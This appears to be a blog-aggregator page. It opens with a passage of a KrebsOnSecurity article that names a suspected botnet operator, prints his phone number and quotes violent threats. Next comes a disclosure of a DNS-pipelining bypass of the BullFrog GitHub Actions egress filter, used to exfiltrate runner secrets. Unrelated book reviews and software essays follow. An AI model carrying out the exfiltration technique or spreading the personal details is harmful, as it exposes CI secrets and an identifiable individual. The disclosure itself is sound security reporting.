DomainTools.com reveals it was used in 2015 to register several Minecraft-themed domains, all assigned to a Jacob Butler in Ottawa, Canada and to the Ottawa phone number 613-909-9727. Constella Intelligence finds [email protected] was used to register an account on the hacker forum Nulled in 2016, as well as the account name “M1CE” on Minecraft. Pivoting off the password used by their Nulled account shows it was shared by the email addresses [email protected] and [email protected] , the latter being an address at a domain for the Ottawa-Carelton District School Board . Data indexed by the breach tracking service Spycloud suggests that at one point Jacob Butler shared a computer with his mother and a sibling, which might explain why their email accounts were connected to the password “jacobsplugs.” Neither Jacob nor any of the other Butler household members responded to requests for comment. The open source intelligence service Epieos finds [email protected] created the GitHub account “ MemeClient .” Meanwhile, Flashpoint indexed a deleted anonymous Pastebin.com post from 2017 declaring that MemeClient was the creation of a user named CPacket — one of Dort’s early monikers. Why is Dort so mad? On January 2, KrebsOnSecurity published The Kimwolf Botnet is Stalking Your Local Network , which explored research into the botnet by Benjamin Brundage , founder of the proxy tracking service Synthient . Brundage figured out that the Kimwolf botmasters were exploiting a little-known weakness in residential proxy services to infect poorly-defended devices — like TV boxes and digital photo frames — plugged into the internal, private networks of proxy endpoints. By the time that story went live, most of the vulnerable proxy providers had been notified by Brundage and had fixed the weaknesses in their systems. That vulnerability remediation process massively slowed Kimwolf’s ability to spread, and within hours of the story’s publication Dort created a Discord server in my name that began publishing personal information about and violent threats against Brundage, Yours Truly, and others. Dort and friends incriminating themselves by planning swatting attacks in a public Discord server. Last week, Dort and friends used that same Discord server (then named “Krebs’s Koinbase Kallers”) to threaten a swatting attack against Brundage, again posting his home address and personal information. Brundage told KrebsOnSecurity that local police officers subsequently visited his home in response to a swatting hoax which occurred around the same time that another member of the server posted a door emoji and taunted Brundage further. Dort, using the alias “Meow,” taunts Synthient founder Ben Brundage with a picture of a door. Someone on the server then linked to a cringeworthy (and NSFW) new Soundcloud diss track recorded by the user DortDev that included a stickied message from Dort saying, “Ur dead nigga. u better watch ur fucking back. sleep with one eye open. bitch.” “It’s a pretty hefty penny for a new front door,” the diss track intoned. “If his head doesn’t get blown off by SWAT officers. What’s it like not having a front door?” With any luck, Dort will soon be able to tell us all exactly what it’s like. Update, 10:29 a.m.: Jacob Butler responded to requests for comment, speaking with KrebsOnSecurity briefly via telephone. Butler said he didn’t notice earlier requests for comment because he hasn’t really been online since 2021, after his home was swatted multiple times. He acknowledged making and distributing a Minecraft cheat long ago, but said he hasn’t played the game in years and was not involved in Dortsolver or any other activity attributed to the Dort nickname after 2021. “It was a really old cheat and I don’t remember the name of it,” Butler said of his Minecraft modification. “I’m very stressed, man. I don’t know if people are going to swat me again or what. After that, I pretty much walked away from everything, logged off and said fuck that. I don’t go online anymore. I don’t know why people would still be going after me, to be completely honest.” When asked what he does for a living, Butler said he mostly stays home and helps his mom around the house because he struggles with autism and social interaction. He maintains that someone must have compromised one or more of his old accounts and is impersonating him online as Dort. “Someone is actually probably impersonating me, and now I’m really worried,” Butler said. “This is making me relive everything.” But there are issues with Butler’s timeline. For example, Jacob’s voice in our phone conversation was remarkably similar to the Jacob/Dort whose voice can be heard in this Sept. 2022 Clash of Code competition between Dort and another coder (Dort lost). At around 6 minutes and 10 seconds into the recording, Dort launches into a cursing tirade that mirrors the stream of profanity in the diss rap that Dortdev posted threatening Brundage. Dort can be heard again at around 16 minutes; at around 26:00, Dort threatens to swat his opponent. Butler said the voice of Dort is not his, exactly, but rather that of an impersonator who had likely cloned his voice. “I would like to clarify that was absolutely not me,” Butler said. “There must be someone using a voice changer. Or something of the sorts. Because people were cloning my voice before and sending audio clips of ‘me’ saying outrageous stuff.”

0 views
devansh Yesterday

Bypassing egress filtering in BullFrog GitHub Action

GitHub Actions runners are essentially ephemeral Linux VMs that execute your CI/CD pipelines. The fact that they can reach the internet by default has always been a quiet concern for security-conscious teams — one malicious or compromised step can silently exfiltrate secrets, environment variables, or runner metadata out to an attacker-controlled server. A handful of tools have been built to address exactly this problem. One of them is BullFrog — a lightweight egress-filtering agent for GitHub Actions that promises to block outbound network traffic to domains outside your allowlist. The idea is elegant: drop everything except what you explicitly trust. So naturally, I poked at it. BullFrog ( ) is an open-source GitHub Actions security tool that intercepts and filters outbound network traffic from your CI runners. You drop it into your workflow as a step, hand it an list and an , and it uses a userspace agent to enforce that policy on every outbound packet. A typical setup looks like this: After this step, any connection to a domain not on the allowlist should be blocked. The idea is solid. Supply chain attacks, secret exfiltration, dependency confusion — all of these require outbound connectivity. Cutting that off at the network layer is a genuinely good defensive primitive. The BullFrog agent ( ) intercepts outbound packets using netfilter queue (NFQUEUE). When a DNS query packet is intercepted, the agent inspects the queried domain against the allowlist. If the domain matches — the packet goes through. If it doesn't — dropped. For DNS over UDP, this is fairly straightforward: one UDP datagram, one DNS message. But DNS also runs over TCP, and TCP is where things get interesting. DNS-over-TCP is used when a DNS response exceeds 512 bytes (common with DNSSEC, large records, etc.), or when a client explicitly prefers TCP for reliability. RFC 1035 specifies that DNS messages over TCP are prefixed with a 2-byte length field to delimit individual messages. Crucially, the same TCP connection can carry multiple DNS messages back-to-back — this is called DNS pipelining (RFC 7766). This is the exact footgun BullFrog stepped on. BullFrog's function parses the incoming TCP payload, extracts the first DNS message using the 2-byte length prefix, checks it against the allowlist, and returns. It never looks at the rest of the TCP payload. If there are additional DNS messages pipelined in the same TCP segment, they are completely ignored. The consequence: if the first message queries an allowed domain, the entire packet is accepted — including any subsequent messages querying blocked domains. Those blocked queries sail right through to the upstream DNS server. The smoking gun is at agent/agent.go#L403 : The function slices , decodes that single DNS message, runs the policy check on it, and returns its verdict. Any bytes after — which may contain one or more additional DNS messages — are never touched. It's a classic "check the first item, trust the rest" mistake. The guard is real, but it only covers the front door. The first query acts as camouflage. The second is the actual payload — it can encode arbitrary data in the subdomain (hostname, runner name, env vars, secrets) and have it resolved by a DNS server the attacker controls. They observe the DNS lookup on their end and retrieve the exfiltrated data — no HTTP, no direct socket to a C2, no obvious telltale traffic pattern. The workflow setup to reproduce this: The script below builds two raw DNS queries, wraps each with a TCP 2-byte length prefix per RFC 1035, concatenates them into a single payload, and sends it over one TCP connection to . Runner metadata (OS, kernel release, hostname, runner name) is embedded in the exfiltration domain. Running this against a real workflow with BullFrog configured to allow only , the runner's OS, kernel version, hostname, and env variable were successfully observed in Burp Collaborator's DNS logs — proving that the second DNS query bypassed the policy entirely. I reported this to the BullFrog team on November 28th, 2025 via their GitHub repository. After roughly three months with no response, acknowledgment, or patch, I'm disclosing this publicly. The vulnerability is straightforward to exploit and affects any workflow using BullFrog with that routes DNS over TCP — which Google's supports natively. Affected Versions : v0.8.4 and likely all prior versions Fixed Versions : None as of disclosure date (did not bother to check) What is BullFrog? How It Works DNS Over TCP Vulnerability Vulnerable Code Proof of Concept Attack Scenario The PoC Script Disclosure Timeline Discovery & Report : 28th November 2025 Vendor Contact : 28th November 2025 Vendor Response : None Public Disclosure : 28th February 2026

0 views

Daemon: a 2006 techno-thriller that reads like a 2026 product roadmap

Fair warning: this post contains spoilers for both Daemon and Freedom™. Then again, the books came out twenty years ago. If you haven’t read them by now, you probably weren’t going to. I highly recommend them both though, if you haven’t read them yet. I finished re-reading Daniel Suarez’s Daemon and its sequel Freedom™ a few weeks ago. I first picked them up years back and thought they were solid techno-thrillers with some wild ideas baked into an entertaining plot. Reading them again in 2026, they’re just as gripping, but for somewhat different reasons. The realism has caught up in a way I wasn’t expecting. When I first read these books, I took them as clever speculation of what the future may look like. Now I’m reading them and thinking: yeah, that exists. That too. And that. The fiction hasn’t aged, the real world has just gone ahead and built most of it. The premise is straightforward: Matthew Sobol, a dying game developer, leaves behind a distributed AI program that activates after his death. The Daemon, as it’s called, begins infiltrating systems, recruiting operatives through an online game-like interface, and systematically restructuring society. In Freedom™ , the sequel, that restructuring plays out in full: decentralised communities, alternative economies, mesh networks, and a population split between those plugged into the new system and those clinging to the old one. Suarez self-published Daemon in 2006. That bears repeating. 2006. YouTube was a year old. The iPhone didn’t exist yet. And this guy was writing about autonomous vehicles, augmented reality glasses, voice-controlled AI agents, distributed botnets acting with real-world consequences, and desktop fabrication units. Not as far-future sci-fi set in 2150, but as things that were five to ten years away. The Daemon’s entire existence starts with what is essentially a cron job. Sobol’s program sits dormant, scraping news headlines, waiting for a specific trigger: reports of his own death. When it finds them, it wakes up and starts executing. It wasn’t a sentient AI gone rogue with a dramatic moment it becomes into being. Just a script polling RSS feeds on a schedule, pattern-matching against text, and firing off the next step in a chain. I had something similar with OpenClaw for a while. Not the assassinations, obviously, but the same fundamental architecture of scheduled tasks that wake up, pull information from the internet, process it, and take action without any human prompting. Morning briefings, inbox sweeps, periodic research jobs. The Daemon’s trigger mechanism felt sinister in 2006. Now it’s a feature you can configure in a YAML file. Yep, I know what you’re thinking - we’ve had cron for a long time and this part was possible even before the book was written - but this is just the first chapter of the book. Then there are the autonomous machines. Sobol’s Daemon deploys “AutoM8s”: driverless vehicles that transport operatives and, in the book’s darker moments, act as weapons. It also uses robotic ground units for surveillance and enforcement. In 2006, this was pure fiction. Now Boston Dynamics has Spot, a quadruped robot dog that autonomously navigates terrain, avoids obstacles, and self-charges. Their Atlas humanoid can do backflips, parkour courses, and 540-degree inverted flips. These are real machines you can watch on YouTube doing things that would have read as absurd twenty years ago. Suarez’s vision of autonomous robots patrolling and operating independently isn’t a prediction anymore, it’s a product catalogue. The always-connected vehicle is another one. In Daemon, the AutoM8s are permanently networked, receiving instructions and sharing data in real time. Every Tesla on the road today is essentially this. Always online, streaming telemetry back to the mothership, receiving over-the-air updates, and feeding its camera data into a collective neural network. The car you’re driving is a node in someone else’s distributed system. Sobol would have appreciated the irony of people voluntarily buying into that. One of the creepier technologies in the books is WiFi-based surveillance, using wireless signals to detect and track people through walls. Suarez wrote about this as a covert capability the Daemon could exploit. Carnegie Mellon researchers have since built exactly that. Their “DensePose from WiFi” system uses standard WiFi router signals to reconstruct human poses in real time, even through solid walls. The reflected signals carry enough information about body shape and movement that a neural network can map what you’re doing in a room without a single camera. It works through drywall, wood, and even concrete up to a point, and none of this is classified military tech. It’s published academic research that anyone can read. The acoustic weapon is probably the one that catches people off guard the most. In Daemon, there’s a directed sound system that can make audio appear to come from right beside you while no one else in the room hears a thing. It sounds like science fiction until you look up parametric speakers. Companies like Holosonics have been selling “Audio Spotlight” systems for years. They work by emitting “modulated ultrasonic beams that demodulate into audible sound only within a tight, targeted area” - I’ve experienced these in airports, but have no idea what that quote actually means. Museums, airports, and retailers already use them, and the military has explored them for crowd control. The effect is exactly what Suarez described, sound that seems to materialise out of thin air, audible only to the person standing in the beam, and you can buy one commercially right now. The social dynamics might be the most on-the-nose parallel of all. In the books, the Daemon recruits human operatives to carry out tasks in the physical world. It finds people, assigns them work, and pays them through its own system. The humans don’t fully understand the bigger picture. They just complete their tasks and collect their reward. In January 2026, a site called RentAHuman.ai launched. It’s a platform where OpenClaw AI agents can hire actual people to perform tasks for them. Humans sign up with their skills and hourly rate, AI agents post jobs, and people complete them for payment in stablecoins. Over 40,000 people registered within days. The framing is different, obviously. It’s gig work, not a shadowy network of mindless humans - arguably. But the underlying structure is identical. AI systems delegating physical-world tasks to human operatives who sign up voluntarily, motivated by compensation and a sense of participation in something larger. Suarez wrote it as dystopian fiction that, in 2006 seemed like only the insane would enroll. We built it as a startup and it got very popular, very quickly. The 10% that hasn’t happened is mostly about scale and centralisation. Sobol’s Daemon is a single, coherent system with an architect’s intent behind every action. Real distributed systems don’t work like that. AI development has been messy, competitive, and fragmented across hundreds, perhaps even thousands, of companies and research labs. There’s no singular Daemon pulling strings, just a chaotic landscape of overlapping systems with no one fully in control. Which, depending on your perspective, might actually be worse. The weaponised autonomous vehicles haven’t materialised in the way Suarez imagined either, though military drones certainly have. The line between his fiction and real-world drone warfare is thinner than most people would be comfortable with. And the neat resolution in Freedom™ , where Darknet communities build something genuinely better, still feels like the most fictional part of the whole thing. We’ve got the decentralised technology. We’ve got the mesh networks and the alternative currencies. What we haven’t got is the social cohesion to do anything coherent with them. Crypto became a speculative casino with massive peaks and equal troughs. The tools exist, but the utopian bit remains out of reach. Suarez wasn’t writing from some academic ivory tower or speculating about technology he’d never touched. He was an IT consultant who spent years working with Fortune 1000 companies, and you can feel that experience on every page. He understood how systems actually work, how they fail, and how they get exploited, which is what makes re-reading both books such a strange experience. He wasn’t guessing at any of this. He was extrapolating from things he could already see forming, and doing it with an accuracy that I genuinely wouldn’t have believed twenty years ago. If you haven’t read Daemon and Freedom™ , go and read them. I track everything I read on Hardcover , and both of these are easy five-star picks. They’re fantastic books on their own merits. The pacing is relentless, the technical detail is sharp without being dry, and the plot keeps pulling you forward. I’d recommend them even if none of the technology had come true. But it has, and not gradually over twenty years. The pace is accelerating. Half the parallels I’ve listed in this post didn’t exist even twelve months ago. OpenClaw’s cron system, RentAHuman.ai, the latest generation of Boston Dynamics robots: all 2025 or 2026 developments. The gap between Suarez’s fiction and our reality is closing faster each year, and that makes the books hit differently every time you revisit them. I suspect they’ll hit differently again in another twelve months, and I can’t wait to re-read them then.

0 views
Ratfactor Yesterday

Dave's book review for The Art of Doing Science and Engineering

My rather long book review and/or collection of notes from reading Richard W. Hamming's opus.

0 views

RE Backseat Software

Reading through Mike Swanson's article "Backseat Software" made me realize why I tend to gravitate to older platforms and software. Software used to be sold with the expectation that it would accomplish the goal you purchased it for. Now, software is all about keeping you engaged, on platform, etc so that you keep renewing your subscription (or even better, part with more money and data). Mike writes "Great tools get out of the way so the user can accomplish their goal". I've been in enough companies where the goal is the opposite. You can't let the user just hop on, finish their task and hop off, think of the metrics! If a user's task is accomplished, they won't realize the value and might not renew! Mike also writes "I don’t want to go back to floppy disks. I like fast updates. I like security patches. I like sync. I like crash reports when they help fix real issues", and to be honest, I disagree with this to a point. I'd love to go back to boxed software on a disc. If a company has to manufacture and distribute, they typically made sure the software was well tested to prevent the cost of reprinting discs. These days, it's a "ship first, fix later" mentality. Speed is all that matters to a modern software company. This mindset is even growing with the VCDLC (Vibe Code Development Life Cycle). Just this morning I found my childhood copy of KidPix Deluxe on CD. I know that, if I had a computer from the era, inserting that disc would result in a full, functional experience. No failed license checks due to offline servers, no gigs of updates and no online account. Instead, KidPix would load and be fun just like it was when I played it. I don't need new features. Software should be sold as is. While new features might come, what you purchased still accomplishes the goal you bought it for. When I run software on my Palm Pilot, it does exactly what it should. No tracking, no announcements, no updates. If a Palm Pilot app is buggy or lacking, you use an app from a different vendor. Quality was necessary to make sales. When you buy a hammer, you expect to be able to hit nails. You don't need a manual, just a good nail to hit. Years later the manufacturer might introduce a new carbon fiber hammer with a larger head that hits nails with 30% more accuracy. Your old hammer won't get these features, but it continues to hit nails just fine. And sure, maybe the new hammer fixed a design flaw with the grip occasionally shifting. But again, you've learned to live with it and it hits nails. The hammer doesn't define your life or act as a status symbol. It's not engaging or addictive. It's a tool, and it hits nails. Software should be like a hammer.

0 views
Justin Duke Yesterday

Unshipping Keystatic

Two years after initially adopting it , we've formally unshipped Keystatic . Our CMS, such as it is, is now a bunch of Markdoc files and a TypeScript schema organizing the front matter — which is to say, it's not really a CMS at all. There were a handful of reasons for this move, in no specific order: That last point is basically what I wrote about Invoke — it's a terrible heuristic, judging a project by its commit frequency, and I know that. Things can and should be finished! And yet. When you're already on the fence, a quiet GitHub graph is the thing that tips you over. To Keystatic's credit, it was tremendously easy to extricate. The whole migration was maybe two hours of work, most of which was just deleting code. That's the sign of a well-designed library — one that doesn't metastasize into every corner of your codebase. I wish more tools were this easy to leave. Our team's use of Keystatic as an actual front-end CMS had dropped to zero. All of the non-coders have grown sufficiently adept with Markdown that the GUI was gathering dust; Keystatic had become a pure schema validation and rendering tool, and offered fairly little beyond what we were already getting from our build step. Some of the theoretically nice things — image hosting, better previewing — either didn't work as smoothly as we'd like or were supplanted entirely by Vercel's built-in features. The project appears to have atrophied a little bit, commits dwindling into the one-per-quarter frequency despite a healthy number of open issues. This is not to besmirch the lovely maintainers, who have many other things going on. But it's harder to stick around on a library you're not getting much value from when you're also worried there's not a lot of momentum down the road.

0 views
Pete Warden 2 days ago

Launching a free, open-source, on-device transcription app

TL;DR – Please try Moonshine Note Taker on your Mac! For years I’ve been telling people that AI wants to be local, that on-device models aren’t just a poor man’s alternative to cloud solutions, and that for some applications they can actually provide a much better user experience. It’s been an uphill battle though, because models all start in a datacenter and using cloud APIs is often so much easier for developers. There was a saying at Google that a picture is worth a thousand words, but a working demonstration is worth a thousand pictures, so with the release of the new Moonshine models I decided to show the advantages in a tangible way. As a CEO my primary job seems to be joining meetings to nod sagely along while I try to figure out what’s going on, and to remember what we decided in previous meetings. Like a lot of people whose job involves this kind of work, I’ve found AI meeting note taking and transcription apps increasingly useful, but I kept wishing the user experience was better: I was also frustrated as an engineer that using the cloud for this use case was an inelegant solution. Speech to text deserves to be a core operating system function, just like keyboard drivers, and using the cloud adds unneeded complexity. To address these issues, I’ve just released the first version of Moonshine Note Taker , for Macs. If you get a chance, please give it a try and let me know what you think. I’m hoping this will be a tangible demonstration of the power of local AI, and inspire more integrations of the Moonshine framework into new and existing applications, so feedback will help a lot. It was often hard to correct or format the transcriptions, especially during meetings. The results would end up on a website I’d have to log into, or in my inbox, when I usually just want to save them on my laptop. Even if an app gave me a live view, there was usually a long delay before text appeared, and it didn’t update very frequently. I found trying to review the notes afterwards more difficult than it needed to be. I often wanted to hear the recording for an important sentence to help my understanding, and most apps don’t let you do that. Trusting a startup to store and protect very sensitive conversations makes me nervous. Servers full of thousands of people’s meetings are always going to be tempting targets for hackers, and you never know when a startup’s business model will change. I already have a thousand subscriptions, keeping track of them is a pain, and there were often usage limits even when I did pay. You can edit and lay out the notes as people are talking with no delay, and using a familiar native Apple interface. The results are . files that you save just like any other document, locally on your machine, never touching the cloud. The transcriptions show up almost instantaneously. Audio is saved alongside the transcription, and playing back a particular section is as simple as selecting the text or moving the caret and pressing the play button. There is absolutely no connection to the cloud. All data is kept entirely on your drive, and can be deleted instantly whenever you decide. Because it’s local, your app will never be bricked by an acquisition or pivot either. Because I don’t have to pay server costs, I can afford to make this free and open source without losing money, and I’ll never have to impose usage limits.

0 views
Jim Nielsen 2 days ago

Computers and the Internet: A Two-Edged Sword

Dave Rupert articulated something in “Priority of idle hands” that’s been growing in my subconscious for years: I had a small, intrusive realization the other day that computers and the internet are probably bad for me […] This is hard to accept because a lot of my work, hobbies, education, entertainment, news, communities, and curiosities are all on the internet. I love the internet, it’s a big part of who I am today Hard same. I love computers and the internet. Always have. I feel lucky to have grown up in the late 90’s / early 00’s where I was exposed to the fascination, excitement, and imagination of PCs, the internet, and then “mobile”. What a time to make websites! Simultaneously, I’ve seen how computers and the internet are a two-edged sword for me: I’ve cut out many great opportunities with them, but I’ve also cut myself a lot (and continue to). Per Dave’s comments, I have this feeling somewhere inside of me that the internet and computers don’t necessarily align in support my own, personal perspective of what a life well lived is for me . My excitement and draw to them also often leave me with a feeling of “I took that too far.” I still haven’t figured out a completely healthy balance (but I’m also doing ok). Dave comes up with a priority of constituencies to deal with his own realization. I like his. Might steal it. But I also think I need to adapt it, make it my own — but I don’t know what that looks like yet. To be honest, I don't think I was ready to confront any of this but reading Dave’s blog forced it out of my subconscious and into the open, so now I gotta deal. Thanks Dave. Reply via: Email · Mastodon · Bluesky

0 views